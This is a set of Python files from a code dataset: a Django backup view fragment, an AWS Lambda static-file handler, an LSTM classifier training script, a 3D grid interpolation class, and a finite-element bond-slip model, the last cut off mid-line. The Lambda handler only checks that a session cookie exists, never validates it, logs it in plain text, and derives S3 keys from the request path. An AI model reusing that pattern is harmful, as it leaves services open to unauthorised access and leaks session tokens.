\"&kind={kinds}\"\n ).format(\n backup_handler=BACKUP_HANDLER,\n backup_name=backup_name,\n gcs_bucket=gcs_bucket,\n kinds=kinds\n )\n\n if queue:\n backup_url += \"&queue={}\".format(queue)\n\n # Backups must be started via task queue or cron.\n taskqueue.add(\n method=\"GET\",\n url=backup_url,\n target=GAE_BUILTIN_MODULE\n )\n\n return HttpResponse(\"Started backup using URL {}\".format(backup_url))\n","sub_path":"djangae/contrib/backup/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"502872870","text":"from __future__ import print_function\nimport json\nimport urllib\nimport os\nimport base64\n\nimport boto3\n\n\nprint('Loading function')\nS3_BUCKET = os.environ['S3_BUCKET']\nSTAGE = os.environ['STAGE']\nAUTH_URL = os.environ['AUTH_URL']\nURL = os.environ['URL']\n\ndef build_config():\n config = {\n \"auth_url\": AUTH_URL,\n \"url\": URL\n }\n return config\n\ndef lambda_handler(event, context):\n print(event)\n try:\n print(urllib.unquote(event['headers']['Cookie']))\n session_cookie = urllib.unquote(event['headers']['Cookie']).split('=')[1]\n print(session_cookie)\n if session_cookie == 'undefined':\n # WARNING: this is not secure. 
\n\ndef lambda_handler(event, context):\n print(event)\n try:\n print(urllib.unquote(event['headers']['Cookie']))\n session_cookie = urllib.unquote(event['headers']['Cookie']).split('=')[1]\n print(session_cookie)\n if session_cookie == 'undefined':\n # WARNING: this is not secure. Cookie should be validated as well...TODO\n body = {\"msg\": \"No session cookie present\"}\n location = AUTH_URL\n headers = {\"Location\": location}\n response = {\n \"statusCode\": 302,\n \"body\": json.dumps(body),\n \"headers\": headers\n }\n return response\n except Exception as e:\n body = {\"msg\": \"No session cookie present\"}\n location = AUTH_URL\n headers = {\"Location\": location}\n response = {\n \"statusCode\": 302,\n \"body\": json.dumps(body),\n \"headers\": headers\n }\n return response\n\n headers = {\n \"Content-Type\": \"text/html\"\n }\n\n path = event['requestContext']['path']\n s3 = boto3.client('s3')\n s3_key = path[1:]\n print(\"S3 key: %s\" % s3_key)\n encoded = False\n\n if path == '/' or path == '':\n s3_key = \"index.html\"\n ct = s3.get_object(Bucket=S3_BUCKET, Key=s3_key)['Body'].read()\n elif path == '/config.json':\n config = build_config()\n ct = json.dumps(config)\n elif path == '/favicon.ico':\n #s3_key = 'favicon.ico'\n headers = {\n \"Content-Type\": \"image/x-icon\"\n }\n encoded = True\n ct = base64.b64encode(s3.get_object(Bucket=S3_BUCKET, Key=s3_key)['Body'].read())\n elif '.png' in path:\n #s3_key = 'favicon.png'\n headers = {\n \"Content-Type\": \"image/png\"\n }\n encoded = True\n ct = base64.b64encode(s3.get_object(Bucket=S3_BUCKET, Key=s3_key)['Body'].read())\n elif '.css' in path:\n #s3_key = event['requestContext']['path'][1:]\n headers = {\n \"Content-Type\": \"text/css\"\n }\n ct = s3.get_object(Bucket=S3_BUCKET, Key=s3_key)['Body'].read()\n elif path.endswith(\".js\"):\n headers = {\n \"Content-Type\": \"text/javascript\"\n }\n print(s3_key)\n ct = s3.get_object(Bucket=S3_BUCKET, Key=s3_key)['Body'].read()\n elif path.endswith(\".woff2\") or path.endswith(\".woff\") or path.endswith(\".ttf\"):\n headers = {\n \"Content-Type\": \"binary/octet-stream\",\n }\n encoded = True\n ct = base64.b64encode(s3.get_object(Bucket=S3_BUCKET, Key=s3_key)['Body'].read())\n else:\n print(\"ELSE: %s\" % s3_key)\n ct = s3.get_object(Bucket=S3_BUCKET, Key=s3_key)['Body'].read()\n print(s3_key)\n\n response = {\n \"statusCode\": 200,\n \"body\": ct,\n \"headers\": headers,\n \"isBase64Encoded\": encoded\n }\n return response\n","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
+{"seq_id":"159898788","text":"\"\"\"\r\n#################################################################################\r\nThe following code contains the implementation of question 1 using LSTM\r\n Sequence length=256\r\n\r\n################################################################################\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\nfrom my_rnn import RNN\r\nimport pandas as pd\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.metrics import precision_recall_curve\r\nfrom sklearn.metrics import roc_curve, roc_auc_score,auc\r\nimport warnings\r\nwarnings.simplefilter(\"ignore\", UserWarning)\r\n\r\n\r\n \r\ndef del_all_flags(FLAGS):\r\n flags_dict = FLAGS._flags() \r\n keys_list = [keys for keys in flags_dict] \r\n for keys in keys_list:\r\n FLAGS.__delattr__(keys)\r\n\r\n\r\ndef onehot_encoding(df_categorical):\r\n result=df_categorical.copy()\r\n for feature_name in result.columns:\r\n one_hot = pd.get_dummies(result[feature_name])\r\n result = result.drop(feature_name,axis = 1)\r\n result = result.join(one_hot,lsuffix='_caller', rsuffix='_other')\r\n return result
training\r\n\"\"\"\r\ndef batch_iter(data, batch_size, num_epochs, shuffle=True):\r\n \"\"\"\r\n Generates a batch iterator for a dataset.\r\n \"\"\"\r\n data = np.array(data)\r\n data_size = len(data)\r\n num_batches_per_epoch = int((len(data) - 1) / batch_size) + 1\r\n for epoch in range(num_epochs):\r\n # Shuffle the data at each epoch\r\n if shuffle:\r\n shuffle_indices = np.random.permutation(np.arange(data_size))\r\n shuffled_data = data[shuffle_indices]\r\n else:\r\n shuffled_data = data\r\n for batch_num in range(num_batches_per_epoch):\r\n start_index = batch_num * batch_size\r\n end_index = min((batch_num + 1) * batch_size, data_size)\r\n yield shuffled_data[start_index:end_index]\r\n\r\n\"\"\"\r\nFuction definition for LSTM Model\r\n\"\"\"\r\ndef train_LSTM_length_256():\r\n del_all_flags(tf.flags.FLAGS)\r\n\r\n flags = tf.app.flags\r\n FLAGS = flags.FLAGS\r\n \r\n # Data loading params\r\n \r\n tf.flags.DEFINE_float(\"dev_sample_percentage\", .3, \"Percentage of the training data to use for validation\")\r\n tf.flags.DEFINE_integer(\"max_sentence_length\", 120, \"Max sentence length in train/test data (Default: 100)\")\r\n \r\n # Model Hyperparameters\r\n tf.flags.DEFINE_string(\"word2vec\", None, \"Word2vec file with pre-trained embeddings\")\r\n tf.flags.DEFINE_integer(\"embedding_dim\", 300, \"Dimensionality of character embedding (Default: 300)\")\r\n tf.flags.DEFINE_integer(\"hidden_size\", 128, \"Dimensionality of character embedding (Default: 128)\")\r\n tf.flags.DEFINE_float(\"dropout_keep_prob\", 0.7, \"Dropout keep probability (Default: 0.5)\")\r\n tf.flags.DEFINE_float(\"l2_reg_lambda\", 3.0, \"L2 regularization lambda (Default: 3.0)\")\r\n \r\n # Training parameters\r\n tf.flags.DEFINE_integer(\"batch_size\", 256, \"Batch Size (Default: 64)\")\r\n tf.flags.DEFINE_integer(\"num_epochs\", 1000, \"Number of training epochs (Default: 100)\")\r\n tf.flags.DEFINE_integer(\"display_every\", 10, \"Number of iterations to display training info.\")\r\n tf.flags.DEFINE_integer(\"evaluate_every\", 500, \"Evaluate model on dev set after this many steps\")\r\n tf.flags.DEFINE_integer(\"checkpoint_every\", 200, \"Save model after this many steps\")\r\n tf.flags.DEFINE_integer(\"num_checkpoints\", 1, \"Number of checkpoints to store\")\r\n tf.flags.DEFINE_float(\"learning_rate\", 1e-3, \"Which learning rate to start with. (Default: 1e-3)\")\r\n \r\n # Misc Parameters\r\n tf.flags.DEFINE_boolean(\"allow_soft_placement\", True, \"Allow device soft device placement\")\r\n tf.flags.DEFINE_boolean(\"log_device_placement\", False, \"Log placement of ops on devices\")\r\n \r\n tf.flags.DEFINE_string(\"cell_type\", \"lstm\", \"Type of rnn cell. 
Choose 'vanilla' or 'lstm' or 'gru' (Default: lstm)\")\r\n\r\n \r\n with tf.device('/cpu:0'):\r\n train_x = pd.read_csv('train_data.csv',header=0)\r\n y=pd.read_csv('train_labels.csv',header=None)\r\n \r\n test_x=pd.read_csv('test_data.csv',header=0)\r\n test_yy=pd.read_csv('test_labels.csv',header=None)\r\n \r\n \"\"\"\r\n #################################################################\r\n one hot encoding of the label\r\n #################################################################\r\n \"\"\"\r\n x=train_x.values\r\n y=onehot_encoding(y)\r\n y=y.values\r\n \r\n vocab_size=10000\r\n \r\n #test data\r\n test_x=test_x.values\r\n test_yy=onehot_encoding(test_yy)\r\n test_yy=test_yy.values\r\n # Randomly shuffle data\r\n np.random.seed(10)\r\n shuffle_indices = np.random.permutation(np.arange(len(y)))\r\n x_shuffled = x[shuffle_indices]\r\n y_shuffled = y[shuffle_indices]\r\n\r\n # Split train/test set\r\n # TODO: This is very crude, should use cross-validation\r\n x_train= x_shuffled[:]\r\n y_train= y_shuffled[:]\r\n \r\n \r\n test_data_x=test_x[:]\r\n test_data_y=test_yy[:]\r\n \r\n print(\"Training with LSTM in progress; please wait until the iterations finish. Thanks\") \r\n\r\n with tf.Graph().as_default():\r\n session_conf = tf.ConfigProto(\r\n allow_soft_placement=FLAGS.allow_soft_placement,\r\n log_device_placement=FLAGS.log_device_placement)\r\n sess = tf.Session(config=session_conf)\r\n \r\n \r\n with sess.as_default():\r\n rnn = RNN(\r\n sequence_length=x_train.shape[1],\r\n num_classes=y_train.shape[1],\r\n vocab_size=vocab_size,\r\n embedding_size=FLAGS.embedding_dim,\r\n cell_type=FLAGS.cell_type,\r\n hidden_size=FLAGS.hidden_size,\r\n l2_reg_lambda=FLAGS.l2_reg_lambda\r\n )\r\n\r\n # Define Training procedure\r\n global_step = tf.Variable(0, name=\"global_step\", trainable=False)\r\n train_op = tf.train.AdamOptimizer(FLAGS.learning_rate).minimize(rnn.loss, global_step=global_step)\r\n\r\n \r\n # Summaries for loss and accuracy\r\n loss_summary = tf.summary.scalar(\"loss\", rnn.loss)\r\n acc_summary = tf.summary.scalar(\"accuracy\", rnn.accuracy)\r\n \r\n # Train Summaries\r\n train_summary_op = tf.summary.merge([loss_summary, acc_summary])\r\n\r\n # Dev summaries\r\n test_set_summary = tf.summary.merge([loss_summary, acc_summary])\r\n\r\n # Checkpoint directory. Tensorflow assumes this directory already exists so we need to create it\r\n \r\n\r\n\r\n # Initialize all variables\r\n sess.run(tf.global_variables_initializer())\r\n\r\n\r\n\r\n # Generate batches\r\n batches = batch_iter(\r\n list(zip(x_train, y_train)), FLAGS.batch_size, FLAGS.num_epochs)\r\n # Training loop. 
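batches yields one shuffled batch (a list of (x, y) tuples) per step; batch_iter above reshuffles the whole training set once per epoch.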
For each batch...\r\n for batch in batches:\r\n x_batch, y_batch = zip(*batch)\r\n # Train\r\n feed_dict = {\r\n rnn.input_text: x_batch,\r\n rnn.input_y: y_batch,\r\n rnn.dropout_keep_prob: FLAGS.dropout_keep_prob\r\n }\r\n _, step, summaries, loss, accuracy = sess.run(\r\n [train_op, global_step, train_summary_op, rnn.loss, rnn.accuracy], feed_dict)\r\n st=int(step/10)\r\n # Training log display\r\n if step % FLAGS.display_every == 0:\r\n print(\"iteration {}, loss {:g}, acc {:g}\".format(st, loss, accuracy))\r\n\r\n \r\n \"\"\"\r\n #########################################################################################################\r\n \r\n Evaluate on a Test Set\r\n \r\n ########################################################################################################\r\n \"\"\"\r\n if step % FLAGS.evaluate_every == 0:\r\n print(\"\\nEvaluation Result on a test set:\")\r\n feed_dict_dev = {\r\n rnn.input_text: test_data_x,\r\n rnn.input_y: test_data_y,\r\n rnn.dropout_keep_prob: 1.0\r\n }\r\n summaries_dev, loss, accuracy,test_y,test_predicted = sess.run(\r\n [test_set_summary, rnn.loss, rnn.accuracy,rnn.true_values,rnn.predicted_value], feed_dict_dev)\r\n \r\n \r\n\r\n print(\"step {}, loss {:g}, acc {:g}\\n\".format(step, loss, accuracy))\r\n \r\n \r\n \"\"\"\r\n ##########################################################\r\n Plot ROC curve at the end of the training and test phase\r\n #########################################################\r\n \"\"\"\r\n #roc plot\r\n \r\n #get probability score\r\n test_score=np.amax(test_predicted,axis=1)\r\n rocAuc = roc_auc_score(test_y, test_score)\r\n falsePositiveRate, truePositiveRate, _ = roc_curve(test_y, test_score)\r\n\r\n plt.figure()\r\n \r\n plt.plot(falsePositiveRate, truePositiveRate, color='green',\r\n lw=1, label='AUC = %0.2f' % rocAuc)\r\n plt.plot([0, 1], [0, 1], color='red', lw=3, linestyle='--',label = 'Random')\r\n plt.xlim([-0.05, 1.05])\r\n plt.ylim([-0.05, 1.05])\r\n plt.xlabel('False Positive Rate')\r\n plt.ylabel('True Positive Rate')\r\n plt.title('Receiver Operating Characteristic (LSTM,test)')\r\n plt.legend(loc=\"lower right\")\r\n plt.show()\r\n \r\n \r\n \"\"\"\r\n plot precision and recall curve\r\n \"\"\"\r\n #get precision and recall values\r\n precision, recall, thresholds = precision_recall_curve(test_y, test_predicted[:,0], pos_label=0)\r\n # average precision score\r\n # precision auc\r\n pr_auc = auc(recall, precision)\r\n # plot\r\n plt.figure(dpi=50)\r\n plt.plot(recall, precision, lw=1, color='blue', label=f'AUPRC={pr_auc:.3f}')\r\n plt.fill_between(recall, precision, -1, alpha=0.5)\r\n plt.title('Precision Recall Curve for LSTM')\r\n plt.xlabel('Recall')\r\n plt.ylabel('Precision')\r\n plt.xlim([-0.05, 1.05])\r\n plt.ylim([-0.05, 1.05])\r\n plt.legend()\r\n plt.show()","sub_path":"lstm_model2.py","file_name":"lstm_model2.py","file_ext":"py","file_size_in_byte":10907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"297249887","text":"from __future__ import annotations\nfrom abc import ABC, abstractmethod\nfrom numpy import number\nfrom typing import SupportsRound, Tuple, Callable\nimport math\nimport numpy as np\nimport numpy.typing as npt\n\n\nclass Dataset(ABC):\n @abstractmethod\n def __getitem__(self, key) -> number:\n pass\n\n\nclass UniformGrid(Dataset):\n \"\"\"Abstraction of a uniform grid dataset\n\n The dataset is indexed via nearest neighbors\n \"\"\"\n\n @staticmethod\n def load(filename: str, reader: Callable) -> UniformGrid:\n 
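# Usage sketch (hypothetical reader: `raw_reader` and its fixed shape are
# illustrative assumptions, not part of this module):
#
#   import numpy as np
#   def raw_reader(path, shape=(64, 64, 64)):  # hypothetical
#       # headerless float32 volume of a known shape
#       return np.fromfile(path, dtype=np.float32).reshape(shape)
#
#   grid = UniformGrid.load("volume.raw", raw_reader)
#   print(grid[10, 20.4, 30.6])  # nearest-neighbour lookup, np.nan out of range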
\"\"\"Static method to read a dataset from a file and construct a UniformGrid dataset\n\n Args:\n filename (str): filename of the dataset\n reader (Callable): a function to read the dataset and return a numpy ndarray with the data\n\n Returns:\n UniformGrid: UniformGrid dataset\n \"\"\"\n return UniformGrid(reader(filename))\n\n def __init__(self, data: npt.NDArray) -> None:\n self.data = data\n self.shape = data.shape\n\n def __getitem__(\n self, key: Tuple[SupportsRound, SupportsRound, SupportsRound]\n ) -> number:\n \"\"\"get element via nearest neighbor\n\n Args:\n key (Tuple[Number, Number, Number]): (x,y,z) tuple\n\n Returns:\n Number: element at specified location\n \"\"\"\n x, y, z = key\n x0 = round(x)\n y0 = round(y)\n z0 = round(z)\n if (\n x0 > self.data.shape[0] - 1\n or x0 < 0\n or y0 > self.data.shape[1] - 1\n or y0 < 0\n or z0 > self.data.shape[2] - 1\n or z0 < 0\n ):\n return np.nan\n return self.data[round(x), round(y), round(z)]\n\n\nclass UniformGridInterpolated(UniformGrid):\n def __init__(self, data: npt.NDArray) -> None:\n UniformGrid.__init__(self, data)\n\n def __getitem__(\n self, key: Tuple[SupportsRound, SupportsRound, SupportsRound]\n ) -> number:\n \"\"\"get element via trilinear interpolation\n\n Args:\n key (Tuple[Number, Number, Number]): (x,y,z) tuple\n\n Returns:\n Number: element at specified location\n \"\"\"\n x, y, z = key\n x0 = math.floor(x)\n y0 = math.floor(y)\n z0 = math.floor(z)\n x1 = x0 + 1 # math.ceil(x + np.spacing(x))\n y1 = y0 + 1 # math.ceil(y + np.spacing(y))\n z1 = z0 + 1 # math.ceil(z + np.spacing(z))\n # verify values are in data range\n if (\n x0 > self.data.shape[0] - 1\n or x0 < 0\n or x1 > self.data.shape[0] - 1\n or x1 < 0\n or y0 > self.data.shape[1] - 1\n or y0 < 0\n or y1 > self.data.shape[1] - 1\n or y1 < 0\n or z0 > self.data.shape[2] - 1\n or z0 < 0\n or z1 > self.data.shape[2] - 1\n or z1 < 0\n ):\n return np.nan\n xd = (x - x0) / (x1 - x0)\n yd = (y - y0) / (y1 - y0)\n zd = (z - z0) / (z1 - z0)\n c000 = self.data[x0, y0, z0]\n c001 = self.data[x0, y0, z1]\n c010 = self.data[x0, y1, z0]\n c011 = self.data[x0, y1, z1]\n c100 = self.data[x1, y0, z0]\n c101 = self.data[x1, y0, z1]\n c110 = self.data[x1, y1, z0]\n c111 = self.data[x1, y1, z1]\n c00 = c000 * (1 - xd) + c100 * xd\n c01 = c001 * (1 - xd) + c101 * xd\n c10 = c010 * (1 - xd) + c110 * xd\n c11 = c011 * (1 - xd) + c111 * xd\n c0 = c00 * (1 - yd) + c10 * yd\n c1 = c01 * (1 - yd) + c11 * yd\n c = c0 * (1 - zd) + c1 * zd\n return c\n\n @staticmethod\n def load(filename: str, reader: Callable) -> UniformGrid:\n \"\"\"Static method to read a dataset from a file and construct a UniformGridInterpolated dataset\n\n Args:\n filename (str): filename of the dataset\n reader (Callable): a function to read the dataset and return a numpy ndarray with the data\n\n Returns:\n UniformGridInterpolated: UniformGridInterpolated dataset\n \"\"\"\n return UniformGridInterpolated(reader(filename))\n\n\nif __name__ == \"__main__\":\n import data_readers.vol as vol_reader\n import matplotlib.pyplot as plt\n\n print(\"testing uniform grid\")\n # dataset = UniformGrid.load(\"data/C60Small.vol\", vol_reader.read)\n dataset = UniformGrid.load(\"data/Skull.vol\", vol_reader.read)\n print(dataset.shape)\n\n plt.figure()\n plt.imshow(dataset.data[30, :, :])\n\n print(\"testing uniform grid trilinear\")\n dataset = UniformGridInterpolated.load(\"data/C60Small.vol\", vol_reader.read)\n data = dataset.data[30, :, :]\n factor = 5\n up_scaled = np.zeros((data.shape[0] * factor, data.shape[1] * 
factor))\n for r, row in enumerate(np.linspace(0, dataset.shape[0], up_scaled.shape[0])):\n for c, col in enumerate(np.linspace(0, dataset.shape[1], up_scaled.shape[1])):\n try:\n up_scaled[r, c] = dataset[30, row, col]\n except:\n pass\n\n plt.figure()\n\n plt.subplot(1, 2, 1)\n plt.title(\"native\")\n plt.imshow(dataset.data[30, :, :])\n\n plt.subplot(1, 2, 2)\n plt.title(\"5x upscale\")\n plt.imshow(up_scaled)\n\n plt.show()\n","sub_path":"CS6040_DataVisualization/Final/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"23082769","text":"'''\r\nCreated on 09.12.2017\r\n\r\n@author: Yingxiong\r\n'''\r\nfrom traits.api import implements, Int, Array, HasTraits, Instance, \\\r\n Property, cached_property, Constant, Float, List\r\nimport numpy as np\r\nfrom cbfe.fets1d52ulrh import FETS1D52ULRH\r\nfrom ibvpy.api import BCDof\r\nimport matplotlib.pyplot as plt\r\nfrom ibvpy.api import BCDof\r\nfrom mathkit.matrix_la.sys_mtx_assembly import SysMtxAssembly\r\nfrom ibvpy.mesh.fe_grid import FEGrid\r\nfrom scipy.misc import derivative\r\n\r\n\r\nclass MATSEval(HasTraits):\r\n E_m = Float(28484, tooltip='Stiffness of the matrix [MPa]',\r\n auto_set=False, enter_set=False)\r\n\r\n E_f = Float(170000, tooltip='Stiffness of the fiber [MPa]',\r\n auto_set=False, enter_set=False)\r\n\r\n E_b = Float(5,\r\n tooltip='Bond stiffness [N/mm]')\r\n\r\n sigma_y = Float(5,\r\n label=\"sigma_y\",\r\n desc=\"Yield stress\",\r\n enter_set=True,\r\n auto_set=False)\r\n\r\n def gb(self, kappa):\r\n return np.piecewise(kappa, [kappa <= 2, kappa > 2], [lambda x: 1. - (5. + x) / (5. * (x + 1.)), lambda x: 1. - (10. - 1.5 * x) / (5. * (x + 1.))])\r\n\r\n def D(self, kappa):\r\n return np.interp(kappa, [0, 2, 4], [0, 2, -1])\r\n\r\n def get_corr_pred(self, eps, d_eps, sig, t_n, t_n1, alpha, q, kappa):\r\n # g = lambda k: 0.8 - 0.8 * np.exp(-k)\r\n # g = lambda k: 1. / (1 + np.exp(-2 * k + 6.))\r\n n_e, n_ip, n_s = eps.shape\r\n D = np.zeros((n_e, n_ip, 3, 3))\r\n D[:, :, 0, 0] = self.E_m\r\n D[:, :, 2, 2] = self.E_f\r\n E_n = self.E_b * (1 - self.gb(kappa))\r\n sig_trial = E_n * (eps[:, :, 1] + d_eps[:,:, 1])\r\n f_trial = abs(sig_trial) - (self.sigma_y + self.D(kappa))\r\n elas = f_trial <= 1e-8\r\n plas = f_trial > 1e-8\r\n d_sig = np.einsum('...st,...t->...s', D, d_eps)\r\n sig += d_sig\r\n\r\n d_kappa = f_trial / E_n * plas\r\n kappa += d_kappa\r\n E_n1 = self.E_b * (1. 
- self.gb(kappa))\r\n sig[:, :, 1] = E_n1 * (eps[:,:, 1] + d_eps[:,:, 1])\r\n E_p = E_n1 - derivative(self.gb, kappa, dx=1e-6)*self.E_b*(eps[:, :, 1] + d_eps[:,:, 1])\r\n D[:, :, 1, 1] = E_n1 * elas + E_p * plas\r\n\r\n return sig, D, alpha, q, kappa\r\n\r\n n_s = Constant(3)\r\n\r\n\r\nclass TStepper(HasTraits):\r\n\r\n mats_eval = Instance(MATSEval, arg=(), kw={}) # material model\r\n\r\n fets_eval = Instance(FETS1D52ULRH, arg=(), kw={}) # element formulation\r\n\r\n A = Property()\r\n '''array containing the A_m, L_b, A_f\r\n '''\r\n\r\n def _get_A(self):\r\n return np.array([self.fets_eval.A_m, self.fets_eval.P_b, self.fets_eval.A_f])\r\n\r\n # Number of elements\r\n n_e_x = 30\r\n # length\r\n L_x = Float(600.0)\r\n\r\n domain = Property(Instance(FEGrid), depends_on='L_x')\r\n '''Diescretization object.\r\n '''\r\n @cached_property\r\n def _get_domain(self):\r\n # Element definition\r\n domain = FEGrid(coord_max=(self.L_x,),\r\n shape=(self.n_e_x,),\r\n fets_eval=self.fets_eval)\r\n return domain\r\n\r\n bc_list = List(Instance(BCDof))\r\n\r\n J_mtx = Property(depends_on='L_x')\r\n '''Array of Jacobian matrices.\r\n '''\r\n @cached_property\r\n def _get_J_mtx(self):\r\n fets_eval = self.fets_eval\r\n domain = self.domain\r\n # [ d, n ]\r\n geo_r = fets_eval.geo_r.T\r\n # [ d, n, i ]\r\n dNr_geo = geo_r[:, :, None] * np.array([1, 1]) * 0.5\r\n # [ i, n, d ]\r\n dNr_geo = np.einsum('dni->ind', dNr_geo)\r\n # [ n_e, n_geo_r, n_dim_geo ]\r\n elem_x_map = domain.elem_X_map\r\n # [ n_e, n_ip, n_dim_geo, n_dim_geo ]\r\n J_mtx = np.einsum('ind,enf->eidf', dNr_geo, elem_x_map)\r\n return J_mtx\r\n\r\n J_det = Property(depends_on='L_x')\r\n '''Array of Jacobi determinants.\r\n '''\r\n @cached_property\r\n def _get_J_det(self):\r\n return np.linalg.det(self.J_mtx)\r\n\r\n B = Property(depends_on='L_x')\r\n '''The B matrix\r\n '''\r\n @cached_property\r\n def _get_B(self):\r\n '''Calculate and assemble the system stiffness matrix.\r\n '''\r\n mats_eval = self.mats_eval\r\n fets_eval = self.fets_eval\r\n domain = self.domain\r\n\r\n n_s = mats_eval.n_s\r\n\r\n n_dof_r = fets_eval.n_dof_r\r\n n_nodal_dofs = fets_eval.n_nodal_dofs\r\n\r\n n_ip = fets_eval.n_gp\r\n n_e = domain.n_active_elems\r\n #[ d, i]\r\n r_ip = fets_eval.ip_coords[:, :-2].T\r\n # [ d, n ]\r\n geo_r = fets_eval.geo_r.T\r\n\r\n J_inv = np.linalg.inv(self.J_mtx)\r\n\r\n # shape function for the unknowns\r\n # [ d, n, i]\r\n Nr = 0.5 * (1. + geo_r[:, :, None] * r_ip[None,:])\r\n dNr = 0.5 * geo_r[:, :, None] * np.array([1, 1])\r\n\r\n # [ i, n, d ]\r\n Nr = np.einsum('dni->ind', Nr)\r\n dNr = np.einsum('dni->ind', dNr)\r\n Nx = Nr\r\n # [ n_e, n_ip, n_dof_r, n_dim_dof ]\r\n dNx = np.einsum('eidf,inf->eind', J_inv, dNr)\r\n\r\n B = np.zeros((n_e, n_ip, n_dof_r, n_s, n_nodal_dofs), dtype='f')\r\n B_N_n_rows, B_N_n_cols, N_idx = [1, 1], [0, 1], [0, 0]\r\n B_dN_n_rows, B_dN_n_cols, dN_idx = [0, 2], [0, 1], [0, 0]\r\n B_factors = np.array([-1, 1], dtype='float_')\r\n B[:, :,:, B_N_n_rows, B_N_n_cols] = (B_factors[None, None,:] *\r\n Nx[:, :, N_idx])\r\n B[:, :,:, B_dN_n_rows, B_dN_n_cols] = dNx[:,:,:, dN_idx]\r\n return B\r\n\r\n def apply_essential_bc(self):\r\n '''Insert initial boundary conditions at the start up of the calculation.. 
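Each BCDof in bc_list registers its constrained (essential, i.e. Dirichlet) degree of
freedom with the global SysMtxAssembly before the first increment. Mirroring the
usage at the bottom of this module, clamping one end and driving the loaded end:

    ts.bc_list = [BCDof(var='u', dof=n_dofs - 2, value=0.0),
                  BCDof(var='u', dof=n_dofs - 1, value=1., time_function=tf)]
    ts.apply_essential_bc()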
\r\n '''\r\n self.K = SysMtxAssembly()\r\n for bc in self.bc_list:\r\n bc.apply_essential(self.K)\r\n\r\n def apply_bc(self, step_flag, K_mtx, F_ext, t_n, t_n1):\r\n '''Apply boundary conditions for the current load increement\r\n '''\r\n for bc in self.bc_list:\r\n bc.apply(step_flag, None, K_mtx, F_ext, t_n, t_n1)\r\n\r\n def get_corr_pred(self, step_flag, U, d_U, eps, sig, t_n, t_n1, alpha, q, kappa):\r\n '''Function calculationg the residuum and tangent operator.\r\n '''\r\n mats_eval = self.mats_eval\r\n fets_eval = self.fets_eval\r\n domain = self.domain\r\n elem_dof_map = domain.elem_dof_map\r\n\r\n n_e = domain.n_active_elems\r\n n_dof_r, n_dim_dof = self.fets_eval.dof_r.shape\r\n n_nodal_dofs = self.fets_eval.n_nodal_dofs\r\n n_el_dofs = n_dof_r * n_nodal_dofs\r\n # [ i ]\r\n w_ip = fets_eval.ip_weights\r\n\r\n d_u_e = d_U[elem_dof_map]\r\n #[n_e, n_dof_r, n_dim_dof]\r\n d_u_n = d_u_e.reshape(n_e, n_dof_r, n_nodal_dofs)\r\n #[n_e, n_ip, n_s]\r\n d_eps = np.einsum('einsd,end->eis', self.B, d_u_n)\r\n\r\n # material response state variables at integration point\r\n sig, D, alpha, q, kappa = mats_eval.get_corr_pred(\r\n eps, d_eps, sig, t_n, t_n1, alpha, q, kappa)\r\n\r\n # update strain ---this should be integrated into the material model\r\n eps += d_eps\r\n\r\n # system matrix\r\n self.K.reset_mtx()\r\n Ke = np.einsum('i,s,einsd,eist,eimtf,ei->endmf',\r\n w_ip, self.A, self.B, D, self.B, self.J_det)\r\n\r\n self.K.add_mtx_array(\r\n Ke.reshape(-1, n_el_dofs, n_el_dofs), elem_dof_map)\r\n\r\n # internal forces\r\n # [n_e, n_n, n_dim_dof]\r\n Fe_int = np.einsum('i,s,eis,einsd,ei->end',\r\n w_ip, self.A, sig, self.B, self.J_det)\r\n F_int = -np.bincount(elem_dof_map.flatten(), weights=Fe_int.flatten())\r\n self.apply_bc(step_flag, self.K, F_int, t_n, t_n1)\r\n return F_int, self.K, eps, sig, alpha, q, kappa\r\n\r\n\r\nclass TLoop(HasTraits):\r\n\r\n ts = Instance(TStepper)\r\n d_t = Float(0.01)\r\n t_max = Float(1.0)\r\n k_max = Int(50)\r\n tolerance = Float(1e-8)\r\n\r\n def eval(self):\r\n\r\n self.ts.apply_essential_bc()\r\n\r\n t_n = 0.\r\n t_n1 = t_n\r\n n_dofs = self.ts.domain.n_dofs\r\n n_e = self.ts.domain.n_active_elems\r\n n_ip = self.ts.fets_eval.n_gp\r\n n_s = self.ts.mats_eval.n_s\r\n U_k = np.zeros(n_dofs)\r\n eps = np.zeros((n_e, n_ip, n_s))\r\n sig = np.zeros((n_e, n_ip, n_s))\r\n alpha = np.zeros((n_e, n_ip))\r\n q = np.zeros((n_e, n_ip))\r\n kappa = np.zeros((n_e, n_ip))\r\n\r\n U_record = np.zeros(n_dofs)\r\n F_record = np.zeros(n_dofs)\r\n sf_record = np.zeros(2 * n_e)\r\n t_record = [t_n]\r\n eps_record = [np.zeros_like(eps)]\r\n sig_record = [np.zeros_like(sig)]\r\n\r\n while t_n1 <= self.t_max - self.d_t:\r\n t_n1 = t_n + self.d_t\r\n k = 0\r\n scale = 1.0\r\n step_flag = 'predictor'\r\n d_U = np.zeros(n_dofs)\r\n d_U_k = np.zeros(n_dofs)\r\n while k <= self.k_max:\r\n if k == self.k_max: # handling non-convergence\r\n print(np.amax(kappa))\r\n print(t_n1)\r\n print('non-convergence')\r\n # scale *= 0.5\r\n # print scale\r\n # t_n1 = t_n + scale * self.d_t\r\n # k = 0\r\n # d_U = np.zeros(n_dofs)\r\n # d_U_k = np.zeros(n_dofs)\r\n # step_flag = 'predictor'\r\n # eps = eps_r\r\n # sig = sig_r\r\n # alpha = alpha_r\r\n # q = q_r\r\n # kappa = kappa_r\r\n\r\n R, K, eps, sig, alpha, q, kappa = self.ts.get_corr_pred(\r\n step_flag, U_k, d_U_k, eps, sig, t_n, t_n1, alpha, q, kappa)\r\n\r\n F_ext = -R\r\n K.apply_constraints(R)\r\n# print 'r', np.linalg.norm(R)\r\n d_U_k = K.solve()\r\n d_U += d_U_k\r\n# print 'r', np.linalg.norm(R)\r\n if np.linalg.norm(R) < 
